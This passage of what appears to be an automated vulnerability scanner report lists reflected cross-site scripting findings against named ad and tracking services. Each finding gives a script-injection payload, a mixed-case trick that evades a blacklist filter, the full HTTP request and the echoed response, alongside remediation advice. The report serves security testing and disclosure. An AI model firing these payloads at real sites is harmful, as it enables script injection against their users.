Expires: Mon, 16 May 2011 14:00:51 GMT
Date: Mon, 09 May 2011 14:00:51 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888ee3b1<script>alert(1)</script>a730d899c17", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


3.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload febf6<script>alert(1)</script>b19c58ceea3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2febf6<script>alert(1)</script>b19c58ceea3&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2febf6<script>alert(1)</script>b19c58ceea3", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


3.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ea8f6<script>alert(1)</script>102f2c0a45 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=ea8f6<script>alert(1)</script>102f2c0a45&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ea8f6<script>alert(1)</script>102f2c0a45", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});


3.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6f7ba<script>alert(1)</script>eda40b8879f was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=6f7ba<script>alert(1)</script>eda40b8879f&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"6f7ba<script>alert(1)</script>eda40b8879f", c6:"", c10:"", c15:"", c16:"", r:""});


3.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7e18e<script>alert(1)</script>03378f6c3ff was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=7e18e<script>alert(1)</script>03378f6c3ff&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"7e18e<script>alert(1)</script>03378f6c3ff", c10:"", c15:"", c16:"", r:""});


3.38. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 92868<script>alert(1)</script>ee1fafea211 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_2758334807592868<script>alert(1)</script>ee1fafea211&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=2790e8cf-579c-4f5e-bf61-6238ae1e9422; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949605; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_2758334807592868<script>alert(1)</script>ee1fafea211({"r":null});
3.39. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 982fc<script>alert(1)</script>61b53c30a60 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3982fc<script>alert(1)</script>61b53c30a60&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:10 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 5150

if (typeof truste == "undefined" || !truste) {    var truste= {};    truste.ca= {};    truste.ca.listeners = {};    truste.img = new Image(1,1);    truste.defjsload = false;        truste.ts = null; //initi
...[SNIP]...
baseName] = bindings;    }}    // prototypes    String.prototype.equalsIgnoreCase = function(arg) {        return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());    }    var te_clr1_att02cont3982fc<script>alert(1)</script>61b53c30a60_ib = '<div id="te-clr1-att02cont3982fc<script>
...[SNIP]...
3.40. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:04 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
_att02cont3_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002",cam:"2",cid:"0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att02cont3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choi
...[SNIP]...
3.41. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload a034b<ScRiPt>alert(1)</ScRiPt>9291441402 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctra034b<ScRiPt>alert(1)</ScRiPt>9291441402 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:28 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3839

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att02cont3_bi={baseName:"te-clr1-att02cont3",anchName:"te-clr1-att02cont3-anch",width:728,height:90,ox:20,oy:0,plc:"tr",iplc:"ctra034b<ScRiPt>alert(1)</ScRiPt>9291441402",intDivName:"te-clr1-att02cont3-itl",iconSpanId:"te-clr1-att02cont3-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont3",noticeBaseUrl:"/camsg?",irBaseUrl:"/cair?",inter
...[SNIP]...
3.42. http://choices.truste.com/ca [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3805

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
nt3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choices.truste.com/ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att02cont3_bi)});
3.43. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f=1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:06 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3803

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
02cont3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choices.truste.com/ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f=1&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att02cont3_bi)});
3.44. http://choices.truste.com/ca [ox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload a5e47<script>alert(1)</script>27256ed0b74 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20a5e47<script>alert(1)</script>27256ed0b74&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
